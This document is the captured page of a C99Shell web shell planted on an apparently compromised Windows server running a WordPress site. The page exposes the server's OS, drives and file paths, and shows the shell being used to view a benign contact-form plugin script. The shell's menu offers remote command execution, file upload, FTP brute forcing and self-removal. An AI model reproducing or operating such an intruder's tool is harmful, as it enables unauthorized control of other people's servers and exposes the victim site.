!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\htdocs\cumbreclima\wp-content\plugins\wcp-contact-form\assets\repeater\js\   drwxrwxrwx
Free 1018.66 MB of 239.26 GB (0.42%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     admin.js (2.32 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
(function($) {  
    $(document).ready(function() { 
        $(document).on('click', '#agp-repeater-scfp_form_settings .agp-del-row', function(e) {
           $(this).closest('.agp-row').remove();
           renumber_table('#scfp-sortable');
        });

        $(document).on('click', '#agp-repeater-scfp_form_settings .agp-up-row', function(e) {            
            var el = $(this).closest('.agp-row');
            var prev = $(el).prev('.agp-row');
            $(el).insertBefore(prev);
            renumber_table('#scfp-sortable');
        });            

        $(document).on('click', '#agp-repeater-scfp_form_settings .agp-down-row', function(e) {                        
            var el = $(this).closest('.agp-row');
            var next = $(el).next('.agp-row');
            $(el).insertAfter(next);
            renumber_table('#scfp-sortable');
        });                    
        
        $(document).on('click', '#agp-repeater-scfp_form_settings .agp-add-row', function(e) {
            var content = $(this).closest('.agp-repeater').find('.agp-row.agp-row-template').html();
            var index = 'xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {var r = Math.random()*16|0,v=c=='x'?r:r&0x3|0x8;return v.toString(16);});

            content = '<div class="agp-row scfp-field-row ui-sortable-handle">' + content.replace(/\[0\]/g, '[' + index + ']').replace(/_0_/g, '_' + index + '_') + '</div>';

            $(this).closest('.agp-repeater').find('.scfp-settings-table-list').append(content);
            renumber_table('#scfp-sortable');
        });
        

        //make table rows sortable
        $('#agp-repeater-scfp_form_settings .scfp-settings-table-list').sortable({
            helper: function (e, ui) {
                ui.children().each(function () {
                    $(this).width($(this).width());
                });
                return ui;
            },
            scroll: true,
            placeholder: "ui-sortable-placeholder",
            stop: function(event,ui) {renumber_table('#scfp-sortable');}
        });

        
        function renumber_table(tableID) {     
            $(tableID + " .agp-row:visible").each(function() {
                count = $(this).parent().children(':visible').index($(this)) + 1;
                $(this).find('.priority').html(count);
            });
        }
 
    });
})(jQuery);

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--